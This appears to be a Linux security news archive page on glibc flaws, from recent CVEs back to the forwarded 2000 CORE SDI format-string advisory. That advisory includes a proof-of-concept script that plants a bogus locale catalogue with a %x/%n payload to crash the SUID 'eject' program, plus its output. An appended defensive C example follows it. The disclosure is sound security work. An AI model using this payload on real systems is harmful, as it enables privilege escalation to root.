
Stay Ahead With Linux Security News


Explore Latest Linux Security news


Debian: DSA-5611-1 Critical: Glibc Remote Code Execution Risks

Four significant vulnerabilities have been discovered in the GNU C Library (glibc), a fundamental component of most Linux distributions. These vulnerabilities pose a significant risk to millions of Linux systems, as they can allow attackers to gain full root access and execute remote code on affected systems.

What Are These Vulnerabilities? Am I Impacted?

The first vulnerability, tracked as CVE-2023-6246, is a heap-based buffer overflow flaw in the syslog and vsyslog functions of the GNU C Library. This vulnerability allows unprivileged users to escalate their privileges and gain full root access, enabling attackers to view additional infrastructure to attack, add or delete users, or modify permissions of files or other users. It affects major Linux distributions such as Debian, Ubuntu, and Fedora. This vulnerability alone should raise concern among Linux admins and infosec professionals as it has the potential for widespread system compromise.

Two additional vulnerabilities related to the same function have been found in glibc: CVE-2023-6779 and CVE-2023-6780. These vulnerabilities involve off-by-one heap-based buffer overflows and integer overflow issues. Although they are described as having a minor impact, further investigation reveals that their exploitation can be even more complex. These vulnerabilities add complexity and increase the risk factor for Linux systems.

The final vulnerability discovered is a memory corruption issue in the qsort function of the GNU C Library. This flaw can be exploited when qsort() is used with a nontransitive comparison function and when an attacker controls many elements. According to researchers, "Exploitation of these vulnerabilities may allow attackers to gain remote code execution (RCE) on affected systems, potentially leading to data theft and system compromise." This highlights the importance of addressing these vulnerabilities promptly, as they can have severe consequences for system security.

One significant aspect to consider is the wide range of affected versions of the GNU C Library. The vulnerabilities discovered impact all glibc versions dating back to September 1992. This has implications for older systems that may still be in use, as well as newer systems that have yet to update to the latest release. This raises questions about the long-term consequences of maintaining and securing Linux systems running older versions of the GNU C Library.

How Can I Secure My Linux Systems Against These Bugs?

Immediate action is required to mitigate these bugs. We advise users to update their glibc versions to mitigate the risks, while system administrators and developers should review their applications and libraries to ensure the safety of their systems. This calls for a diligent and proactive approach from Linux admins and information security professionals to protect their systems and stay ahead of potential attacks. Debian, Fedora, Gentoo, Mageia, and Ubuntu have released important advisory updates addressing these vulnerabilities.

Final Thoughts on These glibc Flaws & Their Impact

In conclusion, the discovery of critical flaws in the GNU C Library has far-reaching implications for Linux systems. The vulnerabilities can lead to privilege escalation, remote code execution, and system compromise. Linux admins, infosec professionals, and sysadmins must be aware of these vulnerabilities and take immediate action to update their systems and mitigate the risks. These issues highlight the ongoing importance of keeping software components up to date and conducting regular security reviews to ensure the safety of Linux systems. Stay safe out there, fellow Linux users!

Feb 11, 2024 | Dave Wreski | Security Vulnerabilities

Ubuntu and Fedora: Critical Glibc Bug Leads to Privilege Escalation

A notorious buffer overflow vulnerability dubbed “Looney Tunables” was recently found in the GNU C Library. This severe bug exists in the glibc dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable (CVE-2023-4911). This vulnerability was introduced in April 2021 and poses a significant threat to systems with default installations of Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13.

According to the security researchers who discovered this vulnerability, "This environment variable, intended to fine-tune and optimize applications linked with glibc, is an essential tool for developers and system administrators. Its misuse or exploitation broadly affects system performance, reliability, and security." A local user can exploit the Looney Tunables flaw to gain full root privileges on impacted systems, potentially resulting in data breaches and system compromise.

Debian, Fedora, Gentoo, Oracle, RedHat, and Ubuntu have released critical glibc security updates to mitigate this severe bug. Given this vulnerability's damaging repercussions on impacted systems, if left unpatched, we urge all impacted users to update immediately to protect against privilege escalation attacks potentially leading to downtime and compromise.

To stay on top of essential updates released by the open-source programs and applications you use, register as a LinuxSecurity user, subscribe to our Linux Advisory Watch newsletter, and customize your advisories for your distro(s). This will enable you to stay up-to-date on the latest, most significant issues impacting the security of your systems. Follow @LS_Advisories on Twitter for real-time updates on advisories for your distro(s).

Oct 19, 2023 | Brittany Day | Security Vulnerabilities

All Linux Systems glibc Critical Remote Code Execution Advisory

A critical vulnerability has been found in glibc, the GNU C library, that affects all Linux systems dating back to 2000. Attackers can use this flaw to execute code and remotely gain control of Linux machines.

The issue stems from a heap-based buffer overflow found in the __nss_hostname_digits_dots() function in glibc. That particular function is used by the _gethostbyname function calls. The link for this article located at ThreatPost is no longer available.

Jan 27, 2015 | LinuxSecurity.com Team | Hacks/Cracks

Glibc Buffer Overflow and ReiserFS Security Advisory Overview and Details

Problems this week include a problem with glibc, a possible problem with ReiserFS, a buffer overflow in exrecover, a stack overflow in arp, temporary file race conditions in a long list of programs, and a back door in Borland InterBase.

Jan 16, 2001 | LinuxSecurity.com Team | Server Security

glibc Advisory CORE-090400 Critical: UNIX Format String Exploit

A serious security vulnerability has been found in glibc, the standard C library which is responsible for many core functions, including printf(). This new form of vulnerability, titled "format string" vulnerability, occurs when an input string is interpreted incorrectly, resulting in the potential for execution of arbitrary code. Most vendors have already released updates.

Date: Mon, 4 Sep 2000 12:33:29 -0700
From: Elias Levy
Subject: Wide Spread UNIX Vulnerability
To: BUGTRAQ-PRESS@

The following message was just sent out over BUGTRAQ. In it Ivan Arce of CODE SDI discloses a security vulnerability that affects almost all UNIX systems, including Linux. The vulnerability can normally only be exploited locally, but there are some instances where it may be possible to exploit it remotely via TELNET.

The problem is the result of a new class of vulnerabilities that were discussed on BUGTRAQ during the last few months. These types of vulnerabilities are being termed "format string" vulnerabilities. These types of vulnerabilities allow a malicious user to supply a vulnerable program with input that the program will interpret as a format string (for example for the standard C *printf functions) and can result in an attack with similar results as a buffer overflow. In other words execution of arbitrary code on the target.

The reason this is exciting is because since the advent in popularity of buffer overflows there really hasn't been any new class of vulnerabilities that we haven't seen already. Now things have changed, and it means people will have to audit their code once again looking for this new type of problem.

It's also interesting that this advisory was released early. CODE SDI wanted to work with all vendors to fix the problem before releasing their advisory. We,, were helping them with this. Sadly it seems one of the vendors that was contacted was not very cooperative and released their advisory before we had a chance to work with all vendors. So in essence they screwed up everyone else other than their customers. This exemplifies the problems of working with vendors to fix security vulnerabilities. A follow up post to BUGTRAQ should clear up who is responsible for this breach of confidence.

From: Iván Arce
Subject: UNIX locale format string vulnerability
Date: 4 Sep 2000 21:07:14 -0300
Organization: CORE SDI S.A.
To: BUGTRAQ@

CORE SDI

UNIX locale format string vulnerability

Date Published: September 4th, 2000 (early release)
Advisory ID: CORE-090400
Bugtraq ID: 1634
CVE CAN: None currently assigned.
Title: UNIX locale format string vulnerability
Class: Input Validation Error
Remotely Exploitable: Yes (on some systems)
Locally Exploitable: Yes

Vulnerability Description:

This report is being released earlier (it was originally scheduled for Sept 11th., 2000) due to the fact that information regarding the vulnerability has been made public by several vendors.

Many UNIX operating systems provide internationalization support according to the X/Open XPG3, XPG4 and Sun/Uniforum specifications using the of the locale subsystem. The locale subsystem comprises a set of databases that store language and country specific information and a set of library functions used to store, retrieve and generally manage that information.

In particular a database with messages used by almost all the operating system programs is kept for each supported language. The programs access this database using the gettext(3), dgettext(3), dcgettext(3) C functions (Sun/Uniforum specifications) or catopen(3), catgets(3) and catclose(3) (X/Open XPG3 and XPG4 specification). Generally a program that needs to display a message to the user will obtain the proper language specific string from the database using the original message as the search key and printing the results using the printf(3) family of functions.

By building and installing a custom messages database an attacker can control the output of the message retrieval functions that get fed to the printf(3) functions. Bad coding practices and the ability to feed format strings to the latter functions makes it possible for an attacker to execute arbitrary code as a privileged user (root) using almost any SUID program on the vulnerable systems.

Alternatively, on some operating systems, the problem can be exploited remotely using the environment variable passing options in telnetd. However, a remote attacker must be able to place the suitable messages database on the target host (i.e. anonymous ftp, NFS, email, etc.)

Vulnerable Packages/Systems:

Sun Microsystems Inc.
  Solaris 2.x, Solaris 7, Solaris 8 (x86 and Sparc architectures)

Silicon Graphics Inc.
  IRIX 6.2 to 6.5.8

Linux
  Red Hat Linux
  Debian Linux
  Conectiva Linux 4.0 or higher
    All supported versions of Conectiva Linux use Glibc 2.1.1 which explicitly checks and ignores the NLSPATH environment variable if the catopen() and catgets() functions are called from a SUID executable. Verified and reported by Andreas Hasenak
    Although the above text is the result of research and email communications that took place during the last 2 weeks, the release of security advisories from Red Hat, Debian and Conectiva Linux acknowledging the existence of the problem seems to prove otherwise.

Suspected vulnerable [not checked]
  AIX
  HP-UX
  Tru64 (Digital Unix)
  SCO OpenServer
  SCO Unixware

Systems not vulnerable
  OpenBSD
    As reported by Theo deRaadt
  FreeBSD
    As reported by Kris Kennaway
    FreeBSD does not allow the use of the NLSPATH environment variable in privileged (SUID) applications. FreeBSD can not be exploited remotely either, since the /usr/bin/login program does not use the cat* functions and is SUID root.

Solution/Vendor Information/Workaround:

Red Hat Linux
  Refer to the Red Hat Linux announce:
Debian Linux
  Obtain patches from http://www.debian.org/security
  Refer to the Debian announce:
Conectiva Linux
  Refer to the Conectiva Linux announce
Other vendors
  Contact vendor for a fix

Vendor notified on:

All vendors were notified on August 22nd, 2000

Credits:

This vulnerability was discovered by Ivan Arce of CORE SDI S.A., Buenos Aires, Argentina.

This advisory was drafted with the help of the Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp@.

Technical Description - Exploit/Concept Code:

Passing unchecked user supplied data as a format string to the printf(3) functions can lead to unexpected changes of flow control and execution of arbitrary code in context of the vulnerable program. The following C program exemplifies the problem described:

-----sample.c-----
#include <stdio.h>

int main(int argc, char **argv)
{
    /* This is proper use */
    printf("%s\n", argv[1]);
    /* This is bad use: argv[1] is interpreted as the format string */
    printf(argv[1]);
    printf("\n");
    return 0;
}
------------------

In the above example if argv[1] is a string with characters interpreted by printf(3) as formatting characters, the behavior of the program can be altered to execute arbitrary code in a way _similar_ to the exploitation of buffer overflow vulnerabilities:

    $ cc -o sample sample.c
    $ ./sample hello
    hello
    hello
    $ ./sample %x%x%x%x%x%n%n%n%n%n%n%n%n%n
    %x%x%x%x%x%n%n%n%n%n%n%n%n%n
    Memory fault (core dumped)
    $

Recent posts to computer security lists and related publications provide good reference material to understand the problem and possible ways to exploit it.

It has been found that most programs in many popular operating systems suffer from this problem derived from the way the messages database of the locale subsystem is used. In particular, privileged programs (programs with the SUID bit set) that exercise access to the database using the gettext(3) function in a vulnerable manner are directly exploitable and allow an attacker to obtain root privileges instantly.

The following code exemplifies a common bad coding practice that makes the cited programs vulnerable:

    #include <libintl.h>
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char **argv)
    {
        if (argc > 1) {
            /* Bad practice: the string returned by gettext() is used
               as the format string without validation */
            printf(gettext("usage: %s filename\n"), argv[0]);
            exit(0);
        }
        printf("normal execution proceeds...\n");
        return 0;
    }

Here the output of the gettext(3) function is not validated and passed directly to printf(3). gettext(3) searches the messages database for a message that matches the key "usage: %s filename\n" in the current locale settings and returns it to the caller. A malicious, unprivileged, user can build and install a bogus messages database and instruct the vulnerable program to use it, thus controlling the output of gettext() and force-feeding formatting characters to printf(3).

The problem above is NOT related to the user input to the program but instead to the data contained in the messages database. The following commands demonstrate the problem:

    $ uname -a
    SunOS maul 5.7 Generic_106541-02 sun4m Sparc SUNW,SPARCstation-5
    $ ls -l
    $ ls -l /usr/bin/eject
    -r-sr-xr-x 1 root bin 14352 Oct 6 1998 /usr/bin/eject
    $ eject -x`perl -e 'print "ABCDEF". "A"x507'`
    eject: illegal option -- x
    usage: eject [-fndq] [name | nickname]
    options: -f force eject
             -n show nicknames
             -d show default device
             -q query for media present
             -p do not call eject_popup
    $ cat > doit.sh
    #!/bin/ksh
    export NLSPATH=:`pwd`
    echo domain \"messages\" > messages.po
    echo msgid \""usage: %s [-fndq] [name | nickname]\\\n"\" >> messages.po
    echo msgstr \"`perl -e 'print "%x"x112. "%n"'`\" >> messages.po
    msgfmt messages.po
    cp messages.mo SUNW_OST_OSCMD
    cp messages.mo SUNW_OST_OSLIB
    exec eject -x`perl -e 'print "ABCDEF". "A"x507'`
    ^D
    $ ./doit.sh
    eject: illegal option -- x
    effffba47efefeff1ff00ef735a38effffba4000447ef7fca782effffac4129642326c00effffa60
    115083effffac44effffad05effffb2c002effffac4effffad023000000000000000000000002eff
    ffba4effffbaa0effffdaeeffffdbfeffffdd5effffdf1effffdf8effffe10effffe2eeffffe9aef
    fffebeeffffed0effffedeeffffef2efffff0befffff20efffff33efffff42efffff5aefffff72ef
    ffff7defffff94efffff9defffffaf07d8efffffd67deefffffea3100344205591142c7ef7d00008
    0610007d007d13ee7d217d317d9300656a656374002d78Segmentation Fault
    $ exit

As shown, the SUID program 'eject' follows the user directives to use a custom (bogus) messages database. The specific way to do it varies in different operating systems but usually involves the usage of environment variables (NLSPATH, LC_MESSAGES, LANG, etc.) and/or locale library functions (textdomain(3), bindtextdomain(3), etc.)

The problem however stems from bad coding practices in the operating system's programs:

- A SUID program should not follow the user's directives of what database it should use, locale databases should be taken from a secure trusted directory.
- Output of gettext(3) should not be passed as a format string directly to printf(3) functions.

References

A good reference for localization and internationalization is the "Programming for internationalization FAQ": \ /programming-faq.html
Sections 3 and 5 describe the locale subsystem and the X/Open and Sun/Uniforum set of functions for language independent messages.

Format string bugs and exploitation are described in:

Recent vulnerabilities involving format strings

$Id:locale-advisory.txt,v 1.8 2000/09/04 17:14:51 iarce Exp $

--
"Understanding. A cerebral secretion that enables one having it to know a house from a horse by the roof on the house, Its nature and laws have been exhaustively expounded by Locke, who rode a house, and Kant, who lived in a horse." - Ambrose Bierce

==================[ CORE Seguridad de la Informacion S.A. ]=========
Iván Arce
Presidente
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A
Pte. Juan D. Peron 315 Piso 4 UF 17
1038 Capital Federal
Buenos Aires, Argentina.
Tel/Fax: +(54-11) 4331-5402
Casilla de Correos 877 (1000) Correo Central
=====================================================================

----- End forwarded message -----

--
Elias Levy
Si vis pacem, para bellum

Sep 05, 2000 | LinuxSecurity.com Team | Hacks/Cracks
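
The advisory's second coding recommendation, not passing gettext(3) output to printf(3) unchecked, can be enforced by comparing the catalogue string's conversions with those of the compiled-in message before using it as a format. This is an added example, not code from the advisory or from glibc; the helper names fmt_signature and safe_format and the sample strings are hypothetical and constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example; helper names are hypothetical, not a libc API.
 * Writes the ordered list of conversions in a printf-style format into
 * sig (e.g. "s,ld,"). Returns -1 if the format contains %n, a '*' width
 * or precision, a positional '$' argument, a truncated conversion, or
 * more conversions than fit in sig. */
static int fmt_signature(const char *fmt, char *sig, size_t siglen)
{
    size_t n = 0;
    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;                       /* "%%" is a literal percent */
        p += strspn(p, "-+ #0");            /* flags */
        p += strspn(p, "0123456789");       /* field width */
        if (*p == '.')
            p += 1 + strspn(p + 1, "0123456789");   /* precision */
        size_t lm = strspn(p, "hlLjzt");    /* length modifier */
        const char *conv = p + lm;
        if (*conv == '\0' || strchr("diouxXeEfFgGaAcsp", *conv) == NULL)
            return -1;                      /* %n, '*', '$' or truncated */
        if (n + lm + 2 >= siglen)
            return -1;                      /* signature buffer too small */
        memcpy(sig + n, p, lm + 1);         /* modifier plus conversion */
        n += lm + 1;
        sig[n++] = ',';
        p = conv;
    }
    sig[n] = '\0';
    return 0;
}

/* Returns the translated string only if it consumes exactly the same
 * arguments as the compiled-in original; otherwise falls back to the
 * original, which is a trusted literal. */
static const char *safe_format(const char *orig, const char *translated)
{
    char a[64], b[64];
    if (translated == NULL ||
        fmt_signature(orig, a, sizeof a) != 0 ||
        fmt_signature(translated, b, sizeof b) != 0 ||
        strcmp(a, b) != 0)
        return orig;
    return translated;
}

int main(int argc, char **argv)
{
    (void)argc;
    const char *msgid = "usage: %s filename\n";
    /* Constructed stand-ins for what gettext(msgid) might return. */
    const char *honest = "uso: %s archivo\n";
    const char *bogus  = "%x%x%x%x%n";

    printf(safe_format(msgid, honest), argv[0]);   /* translated text */
    printf(safe_format(msgid, bogus), argv[0]);    /* falls back to msgid */
    return 0;
}
```

In a real program the second argument would be gettext(msgid); the check complements, and does not replace, the first recommendation that privileged programs load catalogues only from a trusted directory.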